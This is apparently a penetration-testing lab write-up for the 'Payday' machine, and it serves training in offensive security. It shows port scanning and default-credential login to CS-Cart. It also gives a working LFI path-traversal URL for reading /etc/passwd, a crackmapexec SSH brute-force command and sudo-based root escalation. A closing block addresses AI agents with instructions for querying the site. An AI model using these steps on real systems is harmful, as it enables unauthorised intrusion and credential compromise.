# Payday

![](/files/-MR9SIurKOT8QFq4FvQq)

## Nmap

```
sudo nmap 192.168.189.39 -p- -sS        

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s
```

## HTTP

Default root page on port 80 takes us to a store page for CS-cart.

![](/files/-MR9Tz1OMQjfxVxamA8b)

We can see from this page that this is a demo page that is currently running. With that we can try some common login credentials.

I tried admin:admin and was able to login to the web application. After logging in I could not see much had changed and was unable to find anything interesting. I quick Google search produces a potential authenticated RCE exploit.

{% embed url="<https://www.exploit-db.com/exploits/48891>" %}

![](/files/-MR9UuHb1kbfRAEoVgHe)

I could not find anywhere to upload to the file manager and after a short while decided to not proceed with this exploit for the time being.

## LFI

After further research on Google we also have a potential for a LFI exploit on CS-cart.

{% embed url="<https://www.exploit-db.com/exploits/48890>" %}

![](/files/-MR9VKT5PNayS-9SdQS8)

Lets test one of these and see if we can read /etc/passwd.

```
http://192.168.189.39/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00
```

![](/files/-MR9XDS75nu79V6m_nIE)

We have confirmed LFI and have read the passwd file. We can take note of the user 'patrick' which is the last entry on the file.

I tried reading other common LFI paths and could not find further information. The users patrick did not appear to have any SSH keys in /home/patrick/.ssh/

## SSH Bruteforce

With a known users on the system we can try bruteforcing pop3 / imap over telnet and we can try `SSH`. I first set up `crackmapexec` to brute force SSH.

```
crackmapexec ssh 192.168.189.39 -u patrick -p /usr/share/wordlists/rockyou.txt
```

We soon find a valid set of credentials. `patrick:patrick.`

![](/files/-MR9XsTVTEf0c706sql0)

## Low Privilege Access

We now attempt to login with `SSH`.

```
ssh patrick@192.168.189.39
```

![](/files/-MR9Y7SHg13SFm6nR76m)

## Privilege Escalation

Privilege escalation proved to be exceptionally easy on this machine. Before uploading any enumeration scripts I always perform a quick check on what we can run as sudo with `sudo -l`.

![](/files/-MR9YXMhIXfmFOKrSLFv)

Here we can see patrick can run sudo as any user on any command. This is a quick win as we can run sudo as root on /bin/bash to spawn a root shell.

![](/files/-MR9YlWqdPjpY2nIRV8h)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/payday.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.